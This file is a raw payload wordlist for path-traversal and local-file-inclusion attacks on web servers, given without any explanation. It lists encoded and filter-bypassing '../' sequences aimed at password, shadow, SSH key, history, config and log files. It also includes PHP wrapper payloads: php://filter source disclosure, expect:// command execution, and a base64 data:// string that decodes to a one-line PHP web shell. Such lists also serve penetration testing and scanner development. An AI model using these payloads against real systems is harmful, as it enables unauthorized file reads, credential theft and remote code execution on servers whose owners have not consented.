../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd%00
../../../../etc/passwd%2500
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%255c..%255c..%255cwindows%255cwin.ini
..%5c..%5c..%5cwindows%5cwin.ini
/../../../../etc/passwd
\..\..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\windows\win.ini%00
../../../../etc/shadow
..;/..;/..;/etc/passwd
....//....//....//etc/passwd
../../../etc/passwd
../../../../etc/hosts
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/fd/0
../../../../proc/self/fd/1
../../../../proc/self/fd/2
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../var/log/httpd/access_log
../../../../var/log/httpd/error_log
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error_log
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=../index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=admin.php
php://filter/read=convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://input
php://fd/0
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pg==
expect://id
expect://ls
expect://whoami
file:///etc/passwd
file:///etc/hosts
file:///c:/windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
/etc/passwd
/etc/shadow
/etc/hosts
/etc/issue
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/mounts
/proc/net/tcp
/proc/net/udp
/proc/self/status
/home/$USER/.bash_history
/home/$USER/.bashrc
/home/$USER/.ssh/id_rsa
/home/$USER/.ssh/authorized_keys
/root/.bash_history
/root/.ssh/id_rsa
/boot.ini
C:\boot.ini
C:\windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\xampp\htdocs\config.php
C:\xampp\passwords.txt
C:\inetpub\wwwroot\web.config
C:\Program Files\MySQL\my.ini
..%5c..%5c..%5cboot.ini
../../../../../../../etc/passwd
/../../../etc/passwd
..././..././..././etc/passwd
..\../..\../..\../etc/passwd
..;/..;/..;/..;/..;/etc/passwd
....//....//....//....//etc/passwd
../../../../etc/passwd....html
../../../../etc/passwd.../
../../../../etc/passwd%0a
../../../../etc/passwd%0d
../../../../etc/passwd%0d%0a
/index.php?page=....//....//....//etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
.../...//.../...//.../...//etc/passwd